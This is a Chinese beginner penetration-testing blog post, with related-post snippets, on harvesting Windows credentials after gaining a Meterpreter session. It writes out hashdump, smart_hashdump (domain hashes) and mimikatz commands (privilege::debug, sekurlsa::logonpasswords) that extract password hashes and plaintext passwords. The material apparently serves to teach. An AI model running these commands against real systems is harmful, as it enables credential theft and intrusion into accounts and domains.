【网络安全渗透测试零基础入门必知必会】之Metasploit抓取密码,零基础入门到精通,收藏这一篇就够了8

于 2024-07-29 08:55:56 发布
阅读量398 收藏 8
点赞数 5
分类专栏: 程序员 互联网 计算机 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Libra1313/article/details/140761807
版权
程序员 同时被 3 个专栏收录
347 篇文章 12 订阅
订阅专栏
互联网
346 篇文章 2 订阅
订阅专栏
计算机
346 篇文章 2 订阅
订阅专栏

前言

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御第8篇。

本文主要讲解MSF抓取密码

喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。

MSF抓取密码

导出密码哈希

  1. run hashdump命令
      hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限

  2. 在meterpreter_shell中执行run hashdump命令

命令:  
run hashdump

用户哈希数据的输出格式为:

用户名:SID:LM哈希:NTLM哈希:::

3. run windows/gather/smart_hashdump命令
  run windows/gather/smart_hashdump命令的使用需要系统权限。该功能更强大,如果当前用户是域管理员用户,则可以导出域内所有用户的hash

命令:run windows/gather/smart_hashdump

4. 使用mimikatx抓取密码:

  1. 上传mimikatz程序:
      我们还可以通过上传mimikatz程序,然后执行mimikatz程序来获取明文密码

  2. 前提:

执行mimikatz必须System权限,并且在执行时,要根据当前的系统位数进行选择

  1. 使用方法:

在meterpreter_shell的命令行里面查看当前会话的权限,可以看出当前用会话system权限

  1. 查看系统位数,可以看出当前系统位数为X64位:

  3. 选择x64位的mimikatz上传至目标服务器:
    命令:

upload file

  1. 进入mimikatz的交互界面
execute -i -f mimikatz.exe

  1. 在mimikatz交互界面,使用以下两条命令抓取密码
privilege::debug  
sekurlsa::logonpasswords

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
在这里插入图片描述

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

黑客大白
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF后渗透之获取windows登录密码
qq_55364369的博客
09-05 2760
MSF后渗透之获取windows登录密码
渗透测试Metasploit入门精通(1)
m0_70746078的博客
09-25 1700
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安全性。
MSF抓取密码
qq_42383069的博客
03-24 1872
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell中执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
MSF中获取用户密码
m0_53087192的博客
01-16 1686
获取用户密码的方法 抓取自动登录的密码 导出密码哈希 上传mimikatz程序 加载kiwi模块 抓取自动登录的密码 很多用户习惯将计算机设置自动登录,可以使用 run windows/gather/credentials/windows_autologin 抓取自动登录的用户名和密码 导出密码哈希 hashdump 模块可以从SAM数据库中导出本地用户账号,执行: run hashdump 该命令的使用需要系统权限 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 还可以
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6976
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
09-23
第十四节 渗透测试神器Metasploit之初体验(天融信网络安全课程)
渗透测试Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入探讨Metasploit的使用方法,...
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
mimikatz获取系统管理员账号明文密码工具
02-15
mimikatz 是一个来自法国的神器,能直接读取系统管理员密码明文,通杀xp win2003 win7 win2008,这个工具功能很强大,如果您能熟练运用它,就能体会到。
msf渗透实验,抓取密钥及密钥生成原理所引发的问题
qq_64951792的博客
04-26 952
msf渗透实验
msf中使用mimikatz加载用户明文密码
qq_36992014的博客
05-08 866
meterpreter > load mimikatz meterpreter > creds_kerberos 可以获得明文密码 mimikatz 之后改名为kiwi 使用 meterpreter > help kiwi 帮助信息,以后探索
cs与msf权限传递,mimikatz抓取明文密码
最新发布
m0_70638961的博客
05-28 377
由于Windows在win10或Windows2012R2以上时,默认的缓存表中是不存在明文密码的,显示为null,如图所示。创建foreign监听器-->msf监听模块设置端口-->cs执行新建会话选择创建的监听器。所以在这里我们抓取明文的步骤是:手工修改注册表-->强制锁屏-->等待管理员重新登录。重新登录之后可以看到明文抓取成功。强制锁屏可以通过脚本来实现。到这里显示了msf界面就表示传递成功了。3.新建会话选择创建的监听器。
mimikatz获取密码_mimikatz实战域渗透抓取域控管理员密码
weixin_39562327的博客
12-24 910
实验环境:攻击机:Kali ;靶 机:Windows server 2012 ;工具:mimikatz2.1;条件:靶机获取到shell之后必须是管理员的权限;步骤:**我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也不远是漏洞,是微软自己不承认它是漏洞,但是黑客可以利用这个BUG下面我们就要利用msf生成攻...
抓取内网Windows明文密码与hashdump抓取密文
M372109150的博客
05-01 231
msf远程控制实验,首先生成一个木马控制程序--mpf.exe,然后启用MSF攻击平台, 再加载模块和选择payload,并且设置payload参数并且进行监听,提权,hashdump抓取hash值 思考题:windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么? 这两个模块分别都代表什么 为什么第一个模块 永远是一样的aad3 这两个模块的加密算法有什么不同,如何加密的
轻松获取windows 明文登录密码(入侵提权后)
byteway的专栏
04-02 9298
一款获取Windows明文密码的小工具,自己在XP,windows 7 旗舰版上测试成功的。 简单原理: windows 将登录密码加密后没有存文件,而是存在内存中,这样只要我们找到对应的内存段,然后解密那块内存,明文密码就到手了,这里已知windows 的加密密码内存段是在lsass的进程空间里,好了,黑阔们,只要注入到他的进程空间,定位到那块内存,剩下的事就是逆向一个字符串加密算法的过程了,
渗透测试工具篇之Metasploit(MSF)辅助模块的密码爆破
lzp_5257的博客
04-27 2372
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 使用MSF的爆破模块进行进一步“信息收集” 一、常见的哈希加密 -----------------windows------------------------------------------ 系统:windows 例子:Admin:b474d48cdfc4974d86ef4d24904cdd91 长度:98个字符 加密算法:MD4(MD4(Unicode(pass)).Unicode(strtolower(pass)).Unicode.
msf 使用 hashdump 和 wce 提取 hash
热门推荐
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值